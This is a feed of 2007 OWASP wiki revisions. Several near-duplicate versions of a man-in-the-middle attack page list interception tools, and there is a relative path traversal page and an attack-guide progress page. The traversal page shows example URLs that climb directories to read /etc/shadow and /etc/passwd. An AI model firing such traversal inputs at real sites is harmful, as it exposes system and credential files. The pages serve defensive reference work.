The MITM attack could also be done over https connection by using the same technique, the only difference consists  in  the establishment of two independent SSL sessions, one over each TCP connection. The browser sets  a SSL connection with attacker and the attacker establishes  another SSL connection with the web server. In general the browser warns  the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.&lt;br /&gt;
&lt;br /&gt;
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.&lt;br /&gt;
&lt;br /&gt;
===MITM Attack tools===&lt;br /&gt;
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.&lt;br /&gt;
&lt;br /&gt;
*	PacketCreator&lt;br /&gt;
*	Ettercap&lt;br /&gt;
*	Dsniff&lt;br /&gt;
*	Cain e Abel&lt;br /&gt;
&lt;br /&gt;
===MITM Proxy only tools===&lt;br /&gt;
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser &lt;br /&gt;
&lt;br /&gt;
*	OWASP WebScarab&lt;br /&gt;
*	Paros Proxy&lt;br /&gt;
*	Burp Proxy&lt;br /&gt;
*	ProxyFuzz&lt;br /&gt;
*	Odysseus Proxy&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://www.sans.org/reading_room/whitepapers/threats/480.php&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/300.html&lt;br /&gt;
*http://en.wikipedia.org/wiki/Mitm&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Authentication]]&lt;br /&gt;
&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
[[Man-in-the-browser_attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
*[http://cwe.mitre.org/data/definitions/295.html  Digital Certificate]&lt;br /&gt;
*[[Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23073</id>
		<title>Man-in-the-middle attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23073"/>
				<updated>2007-11-05T17:00:45Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Related Threats */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.&lt;br /&gt;
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and  the attacker and the other between the attacker  and the server, as shown in figure 1. Once  the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:main_the_middle.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 1. Illustration of man-in-the-middle attack&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are  all ASCII based. This way, it’s possible to view and interview within the http protocol and  also in the data transferred. So, for example,  it’s possible to capture a session cookie reading the http header, but it’s also possible to change  an  amount of  money transaction inside the application context, as shown in figure 2.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:request.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The MITM attack could also be done over https connection by using the same technique, the only difference consists  in  the establishment of two independent SSL sessions, one over each TCP connection. The browser sets  a SSL connection with attacker and the attacker establishes  another SSL connection with the web server. In general the browser warns  the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.&lt;br /&gt;
&lt;br /&gt;
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.&lt;br /&gt;
&lt;br /&gt;
===MITM Attack tools===&lt;br /&gt;
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.&lt;br /&gt;
&lt;br /&gt;
*	PacketCreator&lt;br /&gt;
*	Ettercap&lt;br /&gt;
*	Dsniff&lt;br /&gt;
*	Cain e Abel&lt;br /&gt;
&lt;br /&gt;
===MITM Proxy only tools===&lt;br /&gt;
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser &lt;br /&gt;
&lt;br /&gt;
*	OWASP WebScarab&lt;br /&gt;
*	Paros Proxy&lt;br /&gt;
*	Burp Proxy&lt;br /&gt;
*	ProxyFuzz&lt;br /&gt;
*	Odysseus Proxy&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://www.sans.org/reading_room/whitepapers/threats/480.php&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/300.html&lt;br /&gt;
*http://en.wikipedia.org/wiki/Mitm&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Authentication]]&lt;br /&gt;
&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[http://www.sans.org/reading_room/whitepapers/threats/480.php  SSL man-in-the-middle attack]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
*[http://cwe.mitre.org/data/definitions/295.html  Digital Certificate]&lt;br /&gt;
*[[Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23072</id>
		<title>Man-in-the-middle attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23072"/>
				<updated>2007-11-05T17:00:04Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.&lt;br /&gt;
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and  the attacker and the other between the attacker  and the server, as shown in figure 1. Once  the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:main_the_middle.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 1. Illustration of man-in-the-middle attack&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are  all ASCII based. This way, it’s possible to view and interview within the http protocol and  also in the data transferred. So, for example,  it’s possible to capture a session cookie reading the http header, but it’s also possible to change  an  amount of  money transaction inside the application context, as shown in figure 2.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:request.JPG]]&lt;br /&gt;
&lt;br /&gt;
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The MITM attack could also be done over https connection by using the same technique, the only difference consists  in  the establishment of two independent SSL sessions, one over each TCP connection. The browser sets  a SSL connection with attacker and the attacker establishes  another SSL connection with the web server. In general the browser warns  the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.&lt;br /&gt;
&lt;br /&gt;
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.&lt;br /&gt;
&lt;br /&gt;
===MITM Attack tools===&lt;br /&gt;
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.&lt;br /&gt;
&lt;br /&gt;
*	PacketCreator&lt;br /&gt;
*	Ettercap&lt;br /&gt;
*	Dsniff&lt;br /&gt;
*	Cain e Abel&lt;br /&gt;
&lt;br /&gt;
===MITM Proxy only tools===&lt;br /&gt;
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser &lt;br /&gt;
&lt;br /&gt;
*	OWASP WebScarab&lt;br /&gt;
*	Paros Proxy&lt;br /&gt;
*	Burp Proxy&lt;br /&gt;
*	ProxyFuzz&lt;br /&gt;
*	Odysseus Proxy&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://www.sans.org/reading_room/whitepapers/threats/480.php&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/300.html&lt;br /&gt;
*http://en.wikipedia.org/wiki/Mitm&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Authentication]]&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[http://www.sans.org/reading_room/whitepapers/threats/480.php  SSL man-in-the-middle attack]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
*[http://cwe.mitre.org/data/definitions/295.html  Digital Certificate]&lt;br /&gt;
*[[Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Relative_Path_Traversal&amp;diff=23071</id>
		<title>Relative Path Traversal</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Relative_Path_Traversal&amp;diff=23071"/>
				<updated>2007-11-05T16:59:51Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
This attack is a variant of Path Traversal and can be exploited when the application accepts the use of relative traversal sequences such as &amp;quot;../&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
More detailed information can be found on [[Path_Traversal]]&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
The following URLs are vulnerable to this attack:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-files.jsp?file=report.pdf  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-page.php?home=aaa.html  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/some-page.asp?page=index.html  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A simple way to execute this attack is like this:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-files?file=../../../../some dir/some file  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/../../../../etc/shadow  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-files?file=../../../../etc/passwd &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[: Category: Information Disclosure]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Path Manipulation]]&lt;br /&gt;
*[[ Path Traversal]]&lt;br /&gt;
*[[ Resource Injection]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23070</id>
		<title>Man-in-the-middle attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&amp;diff=23070"/>
				<updated>2007-11-05T16:59:23Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.&lt;br /&gt;
Using different techniques the attacker splits the original TCP connection in 2 new connections, one between the client and  the attacker and the other between the attacker  and the server, as shown in figure 1. Once  the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:main_the_middle.JPG]]&lt;br /&gt;
Figure 1. Illustration of man-in-the-middle attack&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In the web context the MITM attack is very effective because of the nature of the http protocol and the data transfer which are  all ASCII based. This way, it’s possible to view and interview within the http protocol and  also in the data transferred. So, for example,  it’s possible to capture a session cookie reading the http header, but it’s also possible to change  an  amount of  money transaction inside the application context, as shown in figure 2.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:request.JPG]]&lt;br /&gt;
 Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The MITM attack could also be done over https connection by using the same technique, the only difference consists  in  the establishment of two independent SSL sessions, one over each TCP connection. The browser sets  a SSL connection with attacker and the attacker establishes  another SSL connection with the web server. In general the browser warns  the user that the digital certificate used is not valid, but sometimes the user could ignore the warning because he doesn’t understand the threat.. In some specific contexts it’s possible that the warn doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.&lt;br /&gt;
&lt;br /&gt;
The MITM it’s not only an attack technique but it’s also usually used during a development step of a web application or still used for Web Vulnerability assessments.&lt;br /&gt;
&lt;br /&gt;
===MITM Attack tools===&lt;br /&gt;
There are several tools to realize MITM attack. These tools are particularly efficient in LAN networks environments because implements extra functionalities like the arp spoof capabilities that permits intercept the communication between hosts.&lt;br /&gt;
&lt;br /&gt;
*	PacketCreator&lt;br /&gt;
*	Ettercap&lt;br /&gt;
*	Dsniff&lt;br /&gt;
*	Cain e Abel&lt;br /&gt;
&lt;br /&gt;
===MITM Proxy only tools===&lt;br /&gt;
Proxy tools only permits interact with all the parts of the HTTP protocol like the header and the body of a transaction, but have not the capability to intercept the TCP connection between client and server. To intercept the communication it’s necessary to use other network attack tools or configure the browser &lt;br /&gt;
&lt;br /&gt;
*	OWASP WebScarab&lt;br /&gt;
*	Paros Proxy&lt;br /&gt;
*	Burp Proxy&lt;br /&gt;
*	ProxyFuzz&lt;br /&gt;
*	Odysseus Proxy&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://www.sans.org/reading_room/whitepapers/threats/480.php&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/300.html&lt;br /&gt;
*http://en.wikipedia.org/wiki/Mitm&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category:Authentication]]&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[http://www.sans.org/reading_room/whitepapers/threats/480.php  SSL man-in-the-middle attack]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Session Management Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
*[http://cwe.mitre.org/data/definitions/295.html  Digital Certificate]&lt;br /&gt;
*[[Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Spoofing]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23069</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23069"/>
				<updated>2007-11-05T16:58:39Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Phase 2 - DONE! */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (75% of the project)&lt;br /&gt;
# Attacks categorization (40% of the project)&lt;br /&gt;
# Research and describe new attacks (80% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''90% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 90% Done ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''91'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''48 of 59 items done'''!&lt;br /&gt;
* Attacks and content just reviewed '''2 items'''!&lt;br /&gt;
**[[HTTP_Response_Splitting]]&lt;br /&gt;
**[[SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* Protocol Manipulation&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 ===&lt;br /&gt;
Research and Description of new attacks(under revision):&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=20797&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=22071&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=20712&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=20649&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=22173&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=20874&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=21145&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=22072&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=22725&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=22727&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=21449&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=22073&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=20667&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=20873&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=22728&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=20794&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=20886&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
